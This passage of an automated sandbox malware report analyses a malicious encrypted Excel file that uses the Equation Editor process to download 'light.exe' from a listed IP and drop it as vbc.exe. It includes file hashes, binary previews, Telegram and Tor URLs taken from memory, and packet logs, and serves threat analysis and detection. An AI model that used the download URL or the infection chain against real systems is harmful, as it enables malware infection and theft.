        http://192.158.231.122/light.exetrue
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://ns.a88vbc.exe, 00000004.00000002.2362766983.0000000004B1F000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://api.telegram.org/bot%telegramapi%/vbc.exe, 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmpfalse
          		high
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          192.158.231.122
          		unknownUnited States
          		17216DC74-ASUStrue

          General Information

          Joe Sandbox Version:31.0.0 Red Diamond
          Analysis ID:321291
          Start date:20.11.2020
          Start time:19:30:49
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 6m 35s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:Catalog of our new order.xlsx
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.expl.winXLSX@33204/6@0/1
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 10.3% (good quality ratio 2.9%)
          • Quality average: 23.3%
          • Quality standard deviation: 36.8%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 4
          • Number of non-executed functions: 2
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .xlsx
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
          • Report size exceeded maximum capacity and may have missing behavior information.
          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/321291/sample/Catalog of our new order.xlsx

          Simulations

          Behavior and APIs

          TimeTypeDescription
          19:32:02API Interceptor61x Sleep call for process: EQNEDT32.EXE modified
          19:32:04API Interceptor83x Sleep call for process: vbc.exe modified

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          DC74-ASUSVEM RFQ.jarGet hashmaliciousBrowse
          • 192.158.238.66
          VEM RFQ.jarGet hashmaliciousBrowse
          • 192.158.238.66
          Ordine Novembre.jarGet hashmaliciousBrowse
          • 192.158.238.122
          Ordine Novembre.jarGet hashmaliciousBrowse
          • 192.158.238.122
          20200728.docGet hashmaliciousBrowse
          • 155.254.28.158
          Image RFQ_8503231082020.exeGet hashmaliciousBrowse
          • 155.254.31.51

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exe
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:downloaded
          Size (bytes):618496
          Entropy (8bit):7.861639609576483
          Encrypted:false
          SSDEEP:12288:QCuRfLw9sjK8YFIxdsk9fE4ZSgexsOGnAZK0yCcxx:iREr9kFZTOlZ4CW
          MD5:020BC13012CE4DB6E204CB1ED174851E
          SHA1:46F8FF39E0D5F476B0C2E3A1C8FEEFDFEC32A0B2
          SHA-256:265E971392E878A245DEF23CC9544060FCAFBDC0C61C66CF128688F3D64E2179
          SHA-512:891367401D14B9E41FC0379FC0BDC04526E023E01F6E91C731D14C790B8B6483A11761C34B2D5A673B73ACD45761D11916E6A4A6D692C9E4955AD86F7B00B079
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Reputation:low
          IE Cache URL:http://192.158.231.122/light.exe
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.._.................h..........N.... ........@.. ...............................T....@.....................................K.......B............................................................................ ............... ..H............text...Tg... ...h.................. ..`.rsrc...B............j..............@..@.reloc...............n..............@..B................0.......H.......`................q..pu..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r...p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15AE138F.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
          Category:dropped
          Size (bytes):48770
          Entropy (8bit):7.801842363879827
          Encrypted:false
          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E98F844.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
          Category:dropped
          Size (bytes):48770
          Entropy (8bit):7.801842363879827
          Encrypted:false
          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85EDDC46.emf
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):1099960
          Entropy (8bit):2.01533581083799
          Encrypted:false
          SSDEEP:3072:IXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:2ahIFdyiaT2qtXw
          MD5:3677D2F9B1FB1BFDA3C51CD719514752
          SHA1:0150A469620426546E26641766F5B21E42079E1A
          SHA-256:549CA31BDF7B3DAC8D37EAE522D786A672438B5CC7241901EE8E0297E53C423A
          SHA-512:A8D0526310681C885C246A8E8EF07AE9F0430A3B6E30A984726D2B0F686C18B447A793C06E41CD46ECE1A4CC99E9A2302577A05F1A89D09CF6E6DC2759B5976F
          Malicious:false
          Reputation:low
          Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i...................................................................t....N.X............\........N.X........ ....y.R........ ............z.R............?...............................X...%...7...................{ .@................C.a.l.i.b.r.................X....... ....2.R........\...\....{.R............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
          C:\Users\user\Desktop\~$Catalog of our new order.xlsx
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):330
          Entropy (8bit):1.4377382811115937
          Encrypted:false
          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
          MD5:96114D75E30EBD26B572C1FC83D1D02E
          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
          Malicious:true
          Reputation:moderate, very likely benign file
          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          C:\Users\Public\vbc.exe
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):618496
          Entropy (8bit):7.861639609576483
          Encrypted:false
          SSDEEP:12288:QCuRfLw9sjK8YFIxdsk9fE4ZSgexsOGnAZK0yCcxx:iREr9kFZTOlZ4CW
          MD5:020BC13012CE4DB6E204CB1ED174851E
          SHA1:46F8FF39E0D5F476B0C2E3A1C8FEEFDFEC32A0B2
          SHA-256:265E971392E878A245DEF23CC9544060FCAFBDC0C61C66CF128688F3D64E2179
          SHA-512:891367401D14B9E41FC0379FC0BDC04526E023E01F6E91C731D14C790B8B6483A11761C34B2D5A673B73ACD45761D11916E6A4A6D692C9E4955AD86F7B00B079
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Reputation:low
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.._.................h..........N.... ........@.. ...............................T....@.....................................K.......B............................................................................ ............... ..H............text...Tg... ...h.................. ..`.rsrc...B............j..............@..@.reloc...............n..............@..B................0.......H.......`................q..pu..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r...p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J

          Static File Info

          General

          File type:CDFV2 Encrypted
          Entropy (8bit):7.961529951482354
          TrID:
          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
          File name:Catalog of our new order.xlsx
          File size:201728
          MD5:f19674cfbff25cbd3f128ffd8e78c5c4
          SHA1:07bf03f3b749c3d7f93758068f5a26c520279388
          SHA256:02781481c25663e541fd70525609f84129fb57cf044e57c3e3410972267acc30
          SHA512:f6dd6fd3e49fa5969ee68e45afc78033996bd0436e6e2a1ffb283dbb1f4bf64a063cce741661e8f9a8439453821ea01d30511f519b1cf722694c89a7657c5554
          SSDEEP:3072:PzGYLG33rIUfDOffUxO7Erc6ROgxGQZsWCrA30hksSCtGhH54dbBfoUcQuVAPtmJ:aYLRUbXOYrXGohLHC+CdbBwYRkYW
          File Content Preview:........................>......................................................................................................................................................................................................................................

          File Icon

          Icon Hash:e4e2aa8aa4b4bcb4

          Static OLE Info

          General

          Document Type:OLE
          Number of OLE Files:1

          OLE File "Catalog of our new order.xlsx"

          Indicators

          Has Summary Info:False
          Application Name:unknown
          Encrypted Document:True
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:False
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:
          Flash Objects Count:
          Contains VBA Macros:False

          Streams

          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
          General
          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
          File Type:data
          Stream Size:64
          Entropy:2.73637206947
          Base64 Encoded:False
          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
          Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
          General
          Stream Path:\x6DataSpaces/DataSpaceMap
          File Type:data
          Stream Size:112
          Entropy:2.7597816111
          Base64 Encoded:False
          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
          Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
          General
          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
          File Type:data
          Stream Size:200
          Entropy:3.13335930328
          Base64 Encoded:False
          Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
          General
          Stream Path:\x6DataSpaces/Version
          File Type:data
          Stream Size:76
          Entropy:2.79079600998
          Base64 Encoded:False
          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
          Stream Path: EncryptedPackage, File Type: data, Stream Size: 194952
          General
          Stream Path:EncryptedPackage
          File Type:data
          Stream Size:194952
          Entropy:7.9980445334
          Base64 Encoded:True
          Data ASCII:w . . . . . . . _ : . . . . . . . E j . E S . . . Y . . . 1 . a . _ . r K . 8 1 n . . : F . . 6 4 . f . . : A i E : . . . . . * . . . . . . E . . . . . A 5 U * . . " o . . . 1 . . . . A 5 U * . . " o . . . 1 . . . . A 5 U * . . " o . . . 1 . . . . A 5 U * . . " o . . . 1 . . . . A 5 U * . . " o . . . 1 . . . . A 5 U * . . " o . . . 1 . . . . A 5 U * . . " o . . . 1 . . . . A 5 U * . . " o . . . 1 . . . . A 5 U * . . " o . . . 1 . . . . A 5 U * . . " o . . . 1 . . . . A 5 U * . . " o . . . 1 . . . . A 5 U *
          Data Raw:77 f9 02 00 00 00 00 00 5f 3a de 05 fe 95 07 e6 d5 45 6a 0f 45 53 ed 9d f0 59 ed d4 e2 31 e1 61 14 5f d2 72 4b fa 38 31 6e 8a be 3a 46 a8 9e 36 34 0a 66 94 d3 3a 41 69 45 3a a0 a1 d8 fc 19 2a ad ae ad d2 0e 8f 45 c5 b3 bd ef 84 41 35 55 2a f9 dd 22 6f b8 ab a8 31 b3 bd ef 84 41 35 55 2a f9 dd 22 6f b8 ab a8 31 b3 bd ef 84 41 35 55 2a f9 dd 22 6f b8 ab a8 31 b3 bd ef 84 41 35 55 2a
          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
          General
          Stream Path:EncryptionInfo
          File Type:data
          Stream Size:224
          Entropy:4.56726522318
          Base64 Encoded:False
          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . { . . . . . . X { . . j . . . . . F & % . g u . N . f . . . . . . . . [ . , ! . . . . 8 . . . f . . . 7 X . . . . h . . . . Q . @ D .
          Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

          Network Behavior

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Nov 20, 2020 19:32:05.283638000 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.407967091 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.408149958 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.408795118 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.534420013 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.534444094 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.534463882 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.534481049 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.534497023 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.534507036 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.534512997 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.534529924 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.534533024 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.534535885 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.534538031 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.534547091 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.534554005 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.534564018 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.534575939 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.534579992 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.534590960 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.534605026 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.539104939 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.661571026 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661600113 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661612034 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661624908 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661637068 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661648989 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661660910 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661674023 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661693096 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661710024 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661726952 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661742926 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661762953 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661780119 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661796093 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661797047 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.661812067 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661822081 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.661829948 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661845922 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661849976 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.661863089 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661875963 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.661875963 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.661907911 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.661931038 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.664318085 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.786977053 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787003994 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787015915 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787031889 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787048101 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787061930 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787080050 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787098885 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787116051 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787133932 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787149906 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787168026 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787185907 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787206888 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787225008 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787242889 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787261009 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787277937 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787295103 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787312984 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787331104 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787349939 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787368059 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787384033 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787400961 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787419081 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787432909 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787450075 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787467003 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787486076 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787504911 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787520885 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787538052 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787554979 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787571907 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787587881 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.787801981 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.788486004 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.788503885 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.788516045 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.788532019 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.788609982 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.788665056 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.788722992 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.790467024 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.911906958 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.911953926 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.911978006 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.911998034 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912031889 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912064075 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912092924 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912120104 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912146091 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912173033 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912200928 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912226915 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912260056 CET8049167192.158.231.122192.168.2.22
